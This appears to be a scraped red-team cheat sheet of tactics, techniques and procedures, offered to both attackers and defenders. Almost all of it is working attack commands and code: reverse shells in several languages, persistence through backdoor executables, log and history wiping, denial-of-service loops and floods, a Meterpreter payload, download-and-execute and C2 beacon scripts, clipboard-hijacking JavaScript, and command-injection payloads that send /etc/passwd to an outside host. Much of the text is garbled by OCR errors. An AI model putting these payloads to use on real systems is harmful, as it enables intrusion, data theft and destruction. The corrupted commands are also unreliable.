Useful Techniques, Tactics, and Procedures for red teamers and defenders, alike!
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Linux System Enumeration / Post Exploitation
id w who -a last -a ps -ef df -h uname -a mount cat /etc/issue cat /etc/*-release cat /etc/release cat /proc/version
Linux Miscellaneous Commands / Covering Tracks
chattr (+/-)i file unset HISTFILE unset HISTFILESIZE unset HISTSIZE echo "" /var/log/auth.log echo '''' -/.bash history kill -9 $$ ln /dev/null -/.bash_historj -sf
Fork Bomb
:(){:I: &I;:
tcpdump -i ethO -XX -w out.pcap tcpdump -i ethO port XX dst X.X.X.X
Windows System Enumeration
ver time net session psloglist "Security" -i 528 -s | find /i "Logon Type: 10" net statistics date hostname ipconfig arp -a route print sc query state=all tasklist /svc tasklist /m tasklist /S ip /v taskkill /PID pid /F systeminfo /S ip /U domain\user /P Pwd dir /a /s /b c:\'.pdf' dir /a /b c:\windows\kb' findstr /si password' .txt I •.xmll •.xls tree /F /A c:\ tree.txt reg save HKLl~\Security security.hive echo %USERNAl~E%
Start RDP
reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f (Tunnel RDP through port 443) REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f
PowerShell Enumeration
Get-WmiObject -class win32 operatingsjstem I select -property 1 csv c:\os.txt Get-Service I where object {$ .status -eq ''Running''} (new-object sjstem.net.webclient) .downloadFile(''url'',''dest'') powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $Host.UI.PromptForCredential( 11 title ", 11 message 11 1 11 user" 11 domain") powershell.exe Send-l-1ai1Hessage -to " email " -from " email " -subject "Subject11 -a " attachment file path " -body "Body" -SmtpServer Target Email Server IP
PowerShell Launching Meterpreter Payload
- msfvenom -p Wlndows/meterpreter/reverse https -f psh -a x86 LHOST=l.l.l.l LPORT=443 audit.ps1
- Move audit.ps1 into same folder as encodeMeterpreter.ps1
- Launch Powershell (x86)
- powershell.exe -executionpolicy bypass encodeMeterpreter.ps1
- Copy the encoded Meterpreter string
Windows User Lockout
@echo T est run: for /f %%U in (list.txt) do @for /1 %%C in (1,1,5) do @echo net use \\WIN- 1234\c$ /USER:%%U wrongpass
Windows DHCP Exhaustion
for /L %i in (2,1,254) do (netsh interface ip set address local static 1.1.1.%i netrnask gw I~ %1 ping 12-.0.0.1 -n l -w 10000 nul %1)
Rolling Reboot
for /L %i in (2,1,254) do shutdown /r /m \\l.l.l.%i /f /t 0 /c "Reboot message''
TTL Fingerprinting
Windows : 128 Linux : 64 Network : 255 Solaris : 255
XSS Testing
Use this string on all input fields and identify what remains after filtering for XSS attacks:
Cisco IOS 11.2 – 12.2 Vulnerability
FTP Through Non-Interactive Shell
echo open ip 21 ftp.txt echo user echo pass echo bin echo GET file=tp.txt echo bfe ftp.txt ftp -s:ftp.txt
NetCat Listeners
nc 1234 -e /bin/sh Linux reverse shell nc 1234 -e cmd.exe Windows reverse shell
Python Reverse Shell
python -c 'import socket,subprocess,os; s=socket.socket(socket..;;F_INET, socket.SOCK_STREAL1); s.connect( ("",1234)); os.dup2 (s.fileno() ,0); os.dup2(s.fileno(l,1); os.dup2(s.file:oo(),2); p~subprocess.call( 1"/bin/sh","-i"] I;'
Bash Reverse Shell
bash -i & /dev/tcp/ 0 &1
Windows Persistence
1. REG add HKEY CURRENT USER\Software\l1icrosoft\W indows\CurrentV ersion\Run /v firewall 7t REG SZ /d "c:\windows\system32\backdoor.exe" /f 2. at 19:00 /every:t1,T,W,Th,F cmd /c start "%USERPROFILE%\backdoor.exe" 3. SCHTASKS /Create /RU "SYSTEt1" /SC l1INUTE /t10 45 /TN FIREWALL /TR "%USERPROFILE%\backdoor.exe" /ED 12/12/2012
hping3 targetiP --flood --frag --spoof ip --destport # --syn
Hydra Online Brute Force
hydra -1 ftp -P words -v targetiP ftp
Download HTTP File and Execute
#!/usr/bin/python import urllib2, os urls = [11'',""] port = 11 80" payload = "cb.sh" for url in urls: u = "http://%s:%s/%s" % (url, port, payload) try: r = urllib2.urlopen(u) wfile = open{"/tmp/cb.sh", "wb") wfile.write(r.read()) wfile.close () break except: continue if os.path.exists("/tmp/cb.sh"): os.system("chmod -oo /tmp/cb.sh") os. system ("/tmp/cb. sh")
DICTIONARY ATTACK hashcat -a 0 -m #type hash.txt DICTIONARY + RULES ATTACK hashcat -a 0 -m #type hash.txt COMBINATION ATTACK hashcat -a 1 -m #type hash.txt MASK ATTACK hashcat -a 3 -m #type hash.txt HYBRID DICTIONARY + MASK hashcat -a 6 -m #type hash.txt HYBRID MASK + DICTIONARY hashcat -a 7 -m #type hash.txt dict.txt dict.txt -r rule.txt dict1.txt dict2.txt ?a?a?a?a?a?a dict.txt ?a?a?a?a ?a?a?a?a dict.txt
Malicious Javascript
<script> document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault(); }); </script>
Execute Fileless Scripts in Golang
package main import ( "io/ioutil" "net/http" "os/exec" "time" ) func main() { for { url := "http://my_command_control:8080/executeThisScript" // Download your bash script resp, _ := http.Get(string(url)) defer resp.Body.Close() shellScriptBody, _ := ioutil.ReadAll(resp.Body) // keep in memory cmd := exec.Command("/bin/bash", "-c", string(shellScriptBody)) cmd.Start() // run in background time.Sleep(5000) // wait for the next beaconing } }
Golang Reverse Shell
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;http://cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go
Enumerating IPs with IPInfo
curl ipinfo.io/
{ "ip": "", "hostname": "ec2-54-90-107-240.compute-1.amazonaws.com", "city": "Virginia Beach", "region": "Virginia", "country": "US", "loc": "36.8512,-76.1692", "org": "AS14618 Amazon.com, Inc.", "postal": "23465", "readme": "https://ipinfo.io/missingauth" }
You can also utilize https://cybergordon.com/ to check for IP reputation!
Email Recon
curl emailrep.io/john.smith@gmail.com
{ "email": "john.smith@gmail.com", "reputation": "high", "suspicious": false, "references": 91, "details": { "blacklisted": false, "malicious_activity": false, "malicious_activity_recent": false, "credentials_leaked": true, "credentials_leaked_recent": false, "data_breach": true, "last_seen": "07/27/2019", "domain_exists": true, "domain_reputation": "n/a", "new_domain": false, "days_since_domain_creation": 8773, "suspicious_tld": false, "spam": false, "free_provider": true, "disposable": false, "deliverable": true, "accept_all": false, "valid_mx": true, "spoofable": true, "spf_strict": true, "dmarc_enforced": false, "profiles": [ "lastfm", "pinterest", "foursquare", "aboutme", "spotify", "twitter", "vimeo" ] } }
nrich IP Enumeration:
A command-line tool to quickly analyze all IPs in a file and see which ones have open ports/ vulnerabilities. Can also be fed data from stdin to be used in a data pipeline.
$ wget https://gitlab.com/api/v4/projects/33695681/packages/generic/nrich/latest/nrich_latest_amd64.deb $ sudo dpkg -i nrich_latest_amd64.deb
$ echo | nrich - (ftptech1.pcsoft.fr) Ports: 21, 80, 111, 443 CPEs: cpe:/a:proftpd:proftpd:1.3.5b, cpe:/a:apache:http_server:2.4.25 Vulnerabilities: CVE-2018-11763, CVE-2019-0220, CVE-2017-15710, CVE-2018-1312, CVE-2019-0197, CVE-2017-9798, CVE-2018-1283, CVE-2017-7668, CVE-2017-3169, CVE-2017-15715, CVE-2017-7659, CVE-2018-1333, CVE-2019-0211, CVE-2019-12815, CVE-2017-3167, CVE-2017-9788, CVE-2019-0196, CVE-2017-7679, CVE-2018-17199
$ nrich --help nrich 0.1.0 Add network information to IPs USAGE: nrich [OPTIONS] <filename> FLAGS: -h, --help Prints help information -V, --version Prints version information OPTIONS: -o, --output <output> Output format (shell or json) [default: shell] ARGS: <filename> File containing an IP per line. Non-IPs are ignored
Enumerating Anonymous FTP Logins Using Python:
#!/usr/bin/python3 from ftplib import FTP import sys ips = open(sys.argv[1], 'r') r = ips.readlines() for item in r: item = item.strip() print("[+] Connecting to: %s \n" %item) try: ftp = FTP(item, timeout=3) ftp.login() if ftp.retrlines('LIST') != 0: print("[+] Anonymous login enabled on Host: %s \n" %item) print("="*70+"\n") except: print("[+] Unable to Connect to Host: %s\n" %item) print("="*70+"\n")
- Usage :
python3 FTPLoginChecker.py ip_addresses.txt
- Note : Use shodan_eye.py to search for FTP servers that have the
login enabled. - Search Keyword :
230 anonymous
Python Reverse Shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Enumerate for Priv Esc:
# Login $ az login -u <user> -p <password> # Set Account Subscription $ az account set --subscription "Pay-As-You-Go" # Enumeration for Priv Esc $ az ad user list -o table $ az role assignment list -o table
Shodan.io query to enumerate AWS Instance Metadata Service Access
Google Dorking for AWS Access Keys
inurl:pastebin "AWS_ACCESS_KEY"
Recursively searching for AWS Access Keys on *Nix containers
$ grep -ER "AKIA[A-Z0-9]{16}|ASIA[A-Z0-9]{16}" /
S3 Log Google Dorking
s3 site:amazonaws.com filetype:log
Kubernetes Secrets Harvesting:
$ curl -k -v -H “Authorization: Bearer <jwt_token>” -H “Content-Type: application/json” https://<master_ip>:6443/api/v1/namespaces/default/secrets | jq -r ‘.items[].data’
Web Applications:
Command Injection:
Special Characters
& ; Newline (0x0a or \n) && | || command ` $(command )
Ngrok for Command Injection:
# Start listener $ ./ngrok http 80 # Test for blind injection Input field - > ;%20curl%20blablabla.ngrok.io # Take it all Input field -> ;curl%20-F%20shl=@/etc/passwd%20blablabla.ngrok.io
Useful Commands: Linux
whoami ifconfig ls uname -a
Useful Commands: Windows
whoami ipconfig dir ver
Both Unix and Windows
ls||id; ls ||id; ls|| id; ls || id ls|id; ls |id; ls| id; ls | id ls&&id; ls &&id; ls&& id; ls && id ls&id; ls &id; ls& id; ls & id ls %0A id
Time Delay Commands
& ping -c 10 &
Redirecting Output
& whoami > /var/www/images/output.txt &
OOB (Out Of Band) Exploitation
& nslookup attacker-server.com & & nslookup `whoami`.attacker-server.com &
WAF Bypasses
vuln= %0a wget https://evil.txt/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php vuln= nc -e /bin/bash <attacker-ip> <attacker-port> vuln=echo PAYLOAD > /tmp/payload.txt; cat /tmp/payload.txt | base64 -d > /tmp/payload; chmod 744 /tmp/payload; /tmp/payload
XSS Cheat Sheet:
SSRF Bypasses:
Base-Url: Client-IP: Http-Url: Proxy-Host: Proxy-Url: Real-Ip: Redirect: Referer: Referrer: Refferer: Request-Uri: Uri: Url: X-Client-IP: X-Custom-IP-Authorization: X-Forward-For: X-Forwarded-By: X-Forwarded-For-Original: X-Forwarded-For: X-Forwarded-Host: X-Forwarded-Port: 443 X-Forwarded-Port: 4443 X-Forwarded-Port: 80 X-Forwarded-Port: 8080 X-Forwarded-Port: 8443 X-Forwarded-Scheme: http X-Forwarded-Scheme: https X-Forwarded-Server: X-Forwarded: X-Forwarder-For: X-Host: X-Http-Destinationurl: X-Http-Host-Override: X-Original-Remote-Addr: X-Original-Url: X-Originating-IP: X-Proxy-Url: X-Real-Ip: X-Remote-Addr: X-Remote-IP: X-Rewrite-Url: X-True-IP:
WayBack Machine Enumerator:
Python script for enumerating Wayback Machine internet archives for potential subdomains, sites, and files; specifically potential password and robots.txt files.
#!/usr/bin/env python3 import requests import os # Input Target site = input("Input Target Website: ") # Web Request url = str("https://web.archive.org/cdx/search/cdx?url=" + site + "/*&output=text&fl=original&collapse=urlkey") url_request = requests.get(url) # Write to File web_file = open("/tmp/website_enum.txt", "a") web_file.write(url_request.text) web_file.close() with open("/tmp/website_enum.txt", "r") as file: info = file.read() print("\nPossible Password Files\n") passwords = os.system("grep password /tmp/website_enum.txt") print("\nRobots.txt File\n") robots = os.system("grep robots.txt /tmp/website_enum.txt") print("\nFull Data Can Be Found in /tmp/website_enum.txt\n")
Or use this one-liner to screenshot web pages with EyeWitness!
root@RoseSecurity:~# python3 -c 'import requests; import os; url = str("https://web.archive.org/cdx/search/cdx?url=<website>/*&output=text&fl=original&collapse=urlkey"); url_request = requests.get(url); web_file = open("/tmp/website_enum.txt", "a"); web_file.write(url_request.text); web_file.close()'; eyewitness -f /tmp/website_enum.txt
The Red Team TTP’s is a github repository by RoseSecurity
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